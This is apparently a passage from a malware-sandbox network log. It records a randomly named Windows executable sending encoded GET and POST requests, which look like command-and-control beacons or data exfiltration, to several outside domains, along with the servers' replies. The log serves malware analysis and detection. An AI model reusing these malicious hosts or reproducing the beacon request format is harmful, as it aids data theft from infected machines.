76 4e 53 54 70 33 75 58 78 41 78 4e 74 2b 32 43 4f 5a 44 69 46 63 61 43 35 30 63 36 6e 64 2b 48 70 64 55 75 2b 4a 4b 37 6b 54 75 64 68 74 53 36 4d 75 54 64 79 37 47 66 72 6b 46 65 41 34 4b 45 6d 5a 72 43 58 48 36 4b 59 43 77 35 49 42 71 4c 56 6d 59 34 6d 39 48 74 4d 71 54 70 6d 5a 52 48 35 4b [TRUNCATED] Data Ascii: NbcPAHe=yzT5osvCN/CmER092uPRgwYjUfAElrgrUaZa3DgkT8fVlDs0BIDadkxh5nL80JGxJMM41r4Jd/yKkepwFP7jH8mQf6HpuxDuHx50/E/tIyoZTpBeElgM6L6Sd+L9vn1oudwT4DYyEKPZqI8/f4LJA4WXaiMGjJt38MlD3wbSNmjdfQHip4Npr6sgc7xRD+x7+HwHWRajYARP8xjKgCMPPtbsCNL1lVAP+9bNj9g+vNSTp3uXxAxNt+2COZDiFcaC50c6nd+HpdUu+JK7kTudhtS6MuTdy7GfrkFeA4KEmZrCXH6KYCw5IBqLVmY4m9HtMqTpmZRH5Kviyu4vpzLWp3wkW/EOaWlgeNdiiFomST25EUfNfbNUdINi3q0mpaMSapQI1iujwYBDrVI+2275IB25rMIIfTfX815E8LEAoofUDuw9mPrGaPUijpSiP+yMozEpz0YEHVPzV9Dp2HsyRrLI9UBHadjcCdXodKzNvyOPJE7k/AQyYSIwXq5rivXni+kD7wSbgNikUEO577vqiLn1XcGHqHqUl2r+eeYzvLKNVeYdMX/G3pQNHo1PzTpSCGONAH73+k8To19dv4f1CI4exOnbYdgWjBit+FNMj84eLXQcakdlUzSV35CKaRZ2R8/bkorkoilo3QSDwaamfPALbqApi9BT3rOO7QYBL9ZMSzEEzjbJ1rYHAU/hhp2hrxv5tIaGJ/4QWdT5jCNgskeevi6GvCygOpHe0D2RNNgTc3broL5q5dS0At7y0A+66vcPYKZlz3rix1ezQBlgHtqZaZ0OYiie2J1FyF+XEy13mz9Tjty9KR6QpOyRnLylIGoXmQDiES7m7DxtmTK4ctsLy7LqHhoD3erfEf3STBa3/SKuydh6NgxA612mftu1aXjyJk2VuGZcG5xCO3AMkhRxQvp6Ett4ZMMQdSlgx2OtB6mxicvscoyFi75d5yq3tXsK7Mfgvk5UWXZBN+HhrsBHgkshgGSOVOpgwAzERbuZ [TRUNCATED]
Nov 7, 2024 08:10:24.137839079 CET	374	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:10:24 GMT Server: Apache/2.4.62 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50018	81.169.145.95	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:25.848643064 CET	417	OUT	GET /pq4g/?9Pj=rz_D&NbcPAHe=/x7ZrZ76GI+PVQIB/efztiEAQuNtkt0VDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD8HSA5zGxCmzJwIJ9T37OSxmELpXH1Ey3c0= HTTP/1.1 Host: www.treatyourownhip.online Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:10:26.687990904 CET	374	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:10:26 GMT Server: Apache/2.4.62 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50019	45.79.252.94	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:31.890765905 CET	696	OUT	POST /4sq5/ HTTP/1.1 Host: www.premium303max.rest Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.premium303max.rest Referer: http://www.premium303max.rest/4sq5/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 58 73 4b 48 62 54 75 76 78 66 37 38 38 48 46 72 4d 62 4b 49 4f 69 67 32 4f 76 57 4f 36 34 62 6e 2b 46 49 4b 6e 5a 78 52 51 39 34 36 43 72 44 35 67 59 6c 64 53 67 6e 6b 54 6f 67 4d 50 53 2b 54 47 4a 36 57 38 30 4d 35 4e 37 46 77 5a 6c 61 36 77 35 38 7a 41 69 64 78 77 57 6a 66 30 2b 38 4a 6a 69 59 64 47 48 39 44 64 30 51 6f 63 48 36 72 57 70 63 50 6c 6d 41 69 59 54 46 71 47 41 49 6f 64 45 54 48 66 67 70 32 57 61 37 43 5a 42 44 48 4d 6f 68 54 65 77 4b 49 5a 41 45 69 36 66 68 35 44 63 63 34 4a 37 66 52 6d 68 74 51 37 73 59 4a 35 4f 62 57 6d 5a 43 75 62 4a 6a 55 58 67 74 46 30 51 3d 3d Data Ascii: NbcPAHe=XsKHbTuvxf788HFrMbKIOig2OvWO64bn+FIKnZxRQ946CrD5gYldSgnkTogMPS+TGJ6W80M5N7FwZla6w58zAidxwWjf0+8JjiYdGH9Dd0QocH6rWpcPlmAiYTFqGAIodETHfgp2Wa7CZBDHMohTewKIZAEi6fh5Dcc4J7fRmhtQ7sYJ5ObWmZCubJjUXgtF0Q==
Nov 7, 2024 08:10:32.603751898 CET	399	IN	HTTP/1.1 301 Moved Permanently date: Thu, 07 Nov 2024 07:10:32 GMT expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-ua-compatible: IE=edge x-redirect-by: WordPress vary: X-Forwarded-Proto,Accept-Encoding location: https://www.premium303max.rest/4sq5/ content-length: 0 content-type: text/html; charset=UTF-8 server: Apache connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	50020	45.79.252.94	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:34.428287029 CET	716	OUT	POST /4sq5/ HTTP/1.1 Host: www.premium303max.rest Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.premium303max.rest Referer: http://www.premium303max.rest/4sq5/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 58 73 4b 48 62 54 75 76 78 66 37 38 38 6b 64 72 58 36 4b 49 47 69 67 35 53 2f 57 4f 74 6f 62 72 2b 46 55 4b 6e 62 63 4b 51 75 63 36 43 4b 7a 35 79 70 6c 64 52 67 6e 6b 59 49 67 4a 4c 53 2b 49 47 49 48 72 38 78 30 35 4e 37 52 77 5a 6e 43 36 77 49 38 77 41 79 64 7a 6f 6d 6a 52 77 2b 38 4a 6a 69 59 64 47 48 59 4c 64 30 49 6f 63 32 71 72 56 4b 45 51 37 57 41 68 66 54 46 71 43 41 49 7a 64 45 54 6c 66 68 46 59 57 59 7a 43 5a 41 7a 48 43 5a 68 51 52 77 4b 4b 57 67 46 47 30 66 55 51 62 2b 6f 30 43 71 37 53 6a 54 5a 53 2b 71 56 54 6f 2f 36 42 30 5a 6d 64 47 4f 71 67 61 6a 51 4d 76 63 62 33 4d 71 39 67 48 31 62 37 4f 37 6e 74 73 45 68 2f 4c 75 59 3d Data Ascii: NbcPAHe=XsKHbTuvxf788kdrX6KIGig5S/WOtobr+FUKnbcKQuc6CKz5ypldRgnkYIgJLS+IGIHr8x05N7RwZnC6wI8wAydzomjRw+8JjiYdGHYLd0Ioc2qrVKEQ7WAhfTFqCAIzdETlfhFYWYzCZAzHCZhQRwKKWgFG0fUQb+o0Cq7SjTZS+qVTo/6B0ZmdGOqgajQMvcb3Mq9gH1b7O7ntsEh/LuY=
Nov 7, 2024 08:10:35.158065081 CET	399	IN	HTTP/1.1 301 Moved Permanently date: Thu, 07 Nov 2024 07:10:34 GMT expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-ua-compatible: IE=edge x-redirect-by: WordPress vary: X-Forwarded-Proto,Accept-Encoding location: https://www.premium303max.rest/4sq5/ content-length: 0 content-type: text/html; charset=UTF-8 server: Apache connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	50021	45.79.252.94	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:36.977092028 CET	10798	OUT	POST /4sq5/ HTTP/1.1 Host: www.premium303max.rest Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.premium303max.rest Referer: http://www.premium303max.rest/4sq5/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 58 73 4b 48 62 54 75 76 78 66 37 38 38 6b 64 72 58 36 4b 49 47 69 67 35 53 2f 57 4f 74 6f 62 72 2b 46 55 4b 6e 62 63 4b 51 75 55 36 43 38 6e 35 6a 36 4e 64 51 67 6e 6b 62 49 67 49 4c 53 2f 51 47 49 66 76 38 78 77 70 4e 39 56 77 62 43 65 36 32 39 63 77 4c 79 64 7a 30 57 6a 63 30 2b 38 63 6a 69 6f 5a 47 48 49 4c 64 30 49 6f 63 31 43 72 42 4a 63 51 35 57 41 69 59 54 45 6c 47 41 4a 39 64 45 61 61 66 68 77 74 57 49 54 43 5a 67 6a 48 41 72 4a 51 63 77 4b 45 66 77 46 65 30 66 49 4c 62 2b 31 48 43 71 4f 33 6a 51 46 53 2f 4d 6f 59 79 2b 4b 4b 69 59 33 48 46 63 47 71 45 54 59 67 76 73 76 74 50 35 52 6f 59 31 50 69 55 49 36 7a 30 33 35 55 4b 72 45 47 4c 4b 78 75 57 77 57 53 50 59 73 34 4f 66 79 46 67 49 46 58 69 46 32 6b 54 4f 49 2f 77 69 54 55 7a 41 50 30 66 79 68 2b 71 52 55 2f 2b 70 34 37 37 6c 73 36 7a 6f 35 52 6a 70 74 4c 50 76 42 50 54 77 43 2f 36 31 71 51 65 4c 76 4d 64 57 50 47 6a 49 31 54 39 49 34 62 45 66 73 79 47 4b 31 41 6f 55 45 59 56 65 54 2b 68 67 30 57 74 57 33 47 76 74 [TRUNCATED] Data Ascii: NbcPAHe=XsKHbTuvxf788kdrX6KIGig5S/WOtobr+FUKnbcKQuU6C8n5j6NdQgnkbIgILS/QGIfv8xwpN9VwbCe629cwLydz0Wjc0+8cjioZGHILd0Ioc1CrBJcQ5WAiYTElGAJ9dEaafhwtWITCZgjHArJQcwKEfwFe0fILb+1HCqO3jQFS/MoYy+KKiY3HFcGqETYgvsvtP5RoY1PiUI6z035UKrEGLKxuWwWSPYs4OfyFgIFXiF2kTOI/wiTUzAP0fyh+qRU/+p477ls6zo5RjptLPvBPTwC/61qQeLvMdWPGjI1T9I4bEfsyGK1AoUEYVeT+hg0WtW3GvtN3cP2xtg74i6/HZBzmtAFcL6VBbLV3PMSetDtpldWyExhs8qcbL0VR/YVvBY8e4ujjnTPYfnhc98XDNiEk/o8RZVAtOnkcKrZPmjDqmaOvK/A5z/ceucIVhqPI8v1P+9heU7oD9aAuMRF5iNV9uH1B+eBFat5c4AEP26uTuekmvCFpF+oFV1oCeBsxueqn2VJr/nVIY/OKWDcLJn4paWt+MJs2UiT8LYpga9XEeaXUPEyCsxab6LodBsgA202y1pGAqRxQmKts4mxjBNc/naahb6v8gMZs29ivARoLU/2LYscC87mW0ZLfm6AIHPJQfUESLKv3hEMzWXqZLtZSYBFwRDWJ/44pDZfTTGZfmPmiLNs1c49cDXBtPXkYwkpRFK6Dj+z+FvDKIQXN+nhfMd/VgtmHLvIPtaZD5E1UHg8kP9gHbqqkxqxWEPwxlCrNh4jK30dXN5dji5ZOGQmIWAiS8DHYPinoKBXyqy7P9/vmZiozW77RGASUrT47LA9zmo/GjFfh+kDtQf8OT5R0K+LEvmStLsghBoaQzTircYpev7SHYnCFEY/KzPggCcFi14X5kdf3IXy7wuK9KyVSTc4pfz+w3q26GuEGVo7eE3l8uh2WOjkOkTo0x+FRGzxVgbV4YvmFjlged+sqzfqWoUIUrkMDZ3ddUbG5 [TRUNCATED]
Nov 7, 2024 08:10:37.740475893 CET	399	IN	HTTP/1.1 301 Moved Permanently date: Thu, 07 Nov 2024 07:10:37 GMT expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-ua-compatible: IE=edge x-redirect-by: WordPress vary: X-Forwarded-Proto,Accept-Encoding location: https://www.premium303max.rest/4sq5/ content-length: 0 content-type: text/html; charset=UTF-8 server: Apache connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50022	45.79.252.94	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:39.526510954 CET	413	OUT	GET /4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFBIBrVLT/+01tRxGHQ8IXkE2JVGDAaEVlxk=&9Pj=rz_D HTTP/1.1 Host: www.premium303max.rest Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:10:40.248883963 CET	532	IN	HTTP/1.1 301 Moved Permanently date: Thu, 07 Nov 2024 07:10:40 GMT expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-ua-compatible: IE=edge x-redirect-by: WordPress vary: X-Forwarded-Proto,Accept-Encoding location: http://premium303max.rest/4sq5/?NbcPAHe=auinYk/N7fzuxFx4AOK1CjEJadf5mPDXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFBIBrVLT/+01tRxGHQ8IXkE2JVGDAaEVlxk=&9Pj=rz_D content-length: 0 content-type: text/html; charset=UTF-8 server: Apache connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50023	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:45.503308058 CET	699	OUT	POST /xene/ HTTP/1.1 Host: www.adsdomain-195.click Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.adsdomain-195.click Referer: http://www.adsdomain-195.click/xene/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6c 53 33 47 75 36 55 41 35 6b 30 46 57 4b 45 6b 54 79 75 4e 6f 35 70 79 36 47 63 4c 6d 54 41 44 78 54 4e 56 69 4a 31 64 4e 78 33 74 37 6a 73 53 61 64 64 66 71 62 33 78 6d 78 55 78 52 32 6f 38 37 77 4f 61 2f 42 55 6e 48 2f 75 59 44 48 77 54 4a 34 31 32 4a 34 56 41 58 55 55 4a 7a 72 57 2f 70 32 45 56 53 6d 6c 61 7a 51 46 46 73 43 2b 34 6c 2f 55 41 50 42 6b 5a 48 68 69 70 35 34 4b 5a 62 73 7a 55 2b 35 51 63 71 66 45 4d 47 44 72 31 78 49 57 45 66 77 76 57 4e 7a 6a 46 72 77 68 53 62 4a 75 49 4d 4b 51 58 73 4a 70 4e 59 53 65 59 63 42 6e 6b 34 36 78 35 67 5a 49 4f 42 47 65 79 56 41 3d 3d Data Ascii: NbcPAHe=lS3Gu6UA5k0FWKEkTyuNo5py6GcLmTADxTNViJ1dNx3t7jsSaddfqb3xmxUxR2o87wOa/BUnH/uYDHwTJ412J4VAXUUJzrW/p2EVSmlazQFFsC+4l/UAPBkZHhip54KZbszU+5QcqfEMGDr1xIWEfwvWNzjFrwhSbJuIMKQXsJpNYSeYcBnk46x5gZIOBGeyVA==
Nov 7, 2024 08:10:46.108361006 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:10:45 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: f4f41c42-4126-4c6a-bb8b-10fe82b057e5 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g== set-cookie: parking_session=f4f41c42-4126-4c6a-bb8b-10fe82b057e5; expires=Thu, 07 Nov 2024 07:25:46 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 6a 78 64 30 77 34 42 31 73 6c 73 42 4f 35 59 36 36 78 4f 33 6c 4e 37 41 4e 2b 35 59 57 7a 35 56 65 76 58 76 46 4e 62 6a 68 44 37 42 72 34 65 6f 2f 4b 54 73 6e 2f 56 45 36 6a 73 38 70 56 61 52 59 77 52 4b 4b 47 7a 2f 50 64 43 72 79 53 6a 2f 55 4f 42 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:10:46.108433962 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjRmNDFjNDItNDEyNi00YzZhLWJiOGItMTBmZTgyYjA1N2U1IiwicGFnZV90aW1lIjoxNzMwOTYzND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:48.053422928 CET	719	OUT	POST /xene/ HTTP/1.1 Host: www.adsdomain-195.click Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.adsdomain-195.click Referer: http://www.adsdomain-195.click/xene/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6c 53 33 47 75 36 55 41 35 6b 30 46 58 72 30 6b 52 56 43 4e 67 35 70 78 6d 32 63 4c 73 7a 41 66 78 54 42 56 69 49 42 4e 4e 69 44 74 37 44 63 53 49 73 64 66 74 62 33 78 75 52 55 30 4d 6d 6f 31 37 77 44 6c 2f 41 6f 6e 48 38 53 59 44 44 38 54 4a 72 64 31 47 49 56 47 4d 45 55 63 2b 4c 57 2f 70 32 45 56 53 6d 77 4e 7a 52 74 46 74 7a 75 34 6c 62 67 66 54 52 6b 61 41 68 69 70 39 34 4b 64 62 73 79 33 2b 39 77 32 71 62 30 4d 47 43 62 31 6f 39 36 44 55 77 76 55 4a 7a 69 4e 67 79 4d 72 57 71 50 6a 4f 36 55 74 69 34 64 6f 51 30 54 43 4e 77 47 7a 71 36 56 4b 39 65 42 36 4d 46 6a 37 4f 4f 44 37 75 59 70 5a 30 4c 4b 55 51 6b 64 54 31 64 4b 76 2f 31 34 3d Data Ascii: NbcPAHe=lS3Gu6UA5k0FXr0kRVCNg5pxm2cLszAfxTBViIBNNiDt7DcSIsdftb3xuRU0Mmo17wDl/AonH8SYDD8TJrd1GIVGMEUc+LW/p2EVSmwNzRtFtzu4lbgfTRkaAhip94Kdbsy3+9w2qb0MGCb1o96DUwvUJziNgyMrWqPjO6Uti4doQ0TCNwGzq6VK9eB6MFj7OOD7uYpZ0LKUQkdT1dKv/14=
Nov 7, 2024 08:10:48.687716007 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:10:48 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: 52b4ecf1-f6ba-4d78-bde4-e20df26f8493 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g== set-cookie: parking_session=52b4ecf1-f6ba-4d78-bde4-e20df26f8493; expires=Thu, 07 Nov 2024 07:25:48 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 6a 78 64 30 77 34 42 31 73 6c 73 42 4f 35 59 36 36 78 4f 33 6c 4e 37 41 4e 2b 35 59 57 7a 35 56 65 76 58 76 46 4e 62 6a 68 44 37 42 72 34 65 6f 2f 4b 54 73 6e 2f 56 45 36 6a 73 38 70 56 61 52 59 77 52 4b 4b 47 7a 2f 50 64 43 72 79 53 6a 2f 55 4f 42 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" 